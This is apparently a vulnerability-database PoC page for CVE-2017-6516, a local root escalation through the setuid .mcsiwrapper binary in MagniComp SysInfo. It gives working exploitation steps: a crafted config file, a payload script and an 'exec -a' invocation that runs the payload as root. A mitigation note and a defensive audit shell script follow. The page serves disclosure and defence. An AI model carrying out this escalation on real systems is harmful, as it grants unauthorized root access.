
CVE-2017-6516 PoC — MagniComp Sysinfo permission and access control vulnerability

Associated Vulnerability
Title: MagniComp Sysinfo permission and access control vulnerability (CVE-2017-6516)
Description: MagniComp Sysinfo for Linux and UNIX platforms is a single-system agent and viewer for Linux and UNIX platforms from the US company MagniComp. Versions of MagniComp Sysinfo for Linux and UNIX platforms earlier than 10-H64 contain a local privilege escalation vulnerability. A local attacker can exploit it to gain elevated privileges.
Description
A PoC / methodology to exploit CVE-2017-6516
Readme
# CVE-2017-6516

CVE-2017-6516 is a privilege escalation vulnerability in the `.mcsiwrapper` binary from MagniComp SysInfo in versions earlier than 10-H64. When this binary has the setuid bit set and is outdated, a local user may execute arbitrary code as the owner of the binary, which is often `root`.

## Requirements

- The binary `.mcsiwrapper` must be setuid:
```bash
$ ls -l .mcsiwrapper
-rwsr-xr-x 1 root root .mcsiwrapper
```
- The binary `.mcsiwrapper` must be older than version 10-H64:
```bash
$ .mcsiwrapper --version
<Version under 10-H64>
```

## Exploitation
Create a file `config` with the following contents:
```bash
ExecPath=<Path to a writeable directory>
```

Create a payload executable file in the `ExecPath` directory, for instance:
```bash
#!/bin/sh
whoami
```
And make it executable:
```bash
$ chmod +x payload
```

Run the command:
```bash
$ bash -c "exec -a payload .mcsiwrapper --configfile <path to config file>"
root
```

## Mitigations
Update MagniComp SysInfo so that `.mcsiwrapper` is version 10-H64 or later. Until the update is applied, clearing the setuid bit on `.mcsiwrapper` removes the precondition listed under Requirements.
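The following audit helper is added here and is not part of the original PoC or of MagniComp's software; it checks the two preconditions from the Requirements section (setuid bit set, version older than 10-H64) for a given `.mcsiwrapper`. It assumes `.mcsiwrapper --version` prints a string of the form `<major>-H<build>` such as `10-H63`; the function names are its own.

```shell
# Audit helper added beside the PoC (not MagniComp's or the PoC author's code).
# Flags a .mcsiwrapper that is setuid AND reports a version older than the
# fixed release 10-H64, i.e. both preconditions from the Requirements section.
# Assumption: `.mcsiwrapper --version` prints a string like "10-H63".

FIXED_VERSION="10-H64"

# valid_version V -> exit 0 if V has the assumed <major>-H<build> shape
valid_version() {
    case "$1" in [0-9]*-H[0-9]*) return 0 ;; *) return 1 ;; esac
}

# version_lt A B -> exit 0 if A is older than B (major first, then H build)
version_lt() {
    valid_version "$1" && valid_version "$2" || return 2
    a_major=${1%%-*}; a_build=${1##*-H}
    b_major=${2%%-*}; b_build=${2##*-H}
    if [ "$a_major" -ne "$b_major" ]; then
        [ "$a_major" -lt "$b_major" ]
        return
    fi
    [ "$a_build" -lt "$b_build" ]
}
# is_vulnerable_version V -> exit 0 when V is older than 10-H64
is_vulnerable_version() {
    version_lt "$1" "$FIXED_VERSION"
}

# audit_binary PATH -> exit 0 only when PATH is setuid and reports a
# vulnerable version; prints a one-line verdict either way
audit_binary() {
    bin=$1
    if [ ! -u "$bin" ]; then
        echo "$bin: setuid bit not set, PoC precondition absent"
        return 1
    fi
    ver=$("$bin" --version 2>/dev/null | head -n 1)
    if is_vulnerable_version "$ver"; then
        echo "$bin: setuid and version $ver is older than $FIXED_VERSION: VULNERABLE"
        return 0
    fi
    echo "$bin: setuid, version '$ver' is not older than $FIXED_VERSION (or unparsable)"
    return 1
}

# scan_setuid_copies -> audit every setuid .mcsiwrapper found on the system
scan_setuid_copies() {
    find / -type f -name .mcsiwrapper -perm -4000 2>/dev/null |
        while read -r f; do audit_binary "$f" || :; done
    return 0
}
```

Source the file and call `audit_binary /path/to/.mcsiwrapper` for one installation, or `scan_setuid_copies` to walk the whole filesystem for setuid copies.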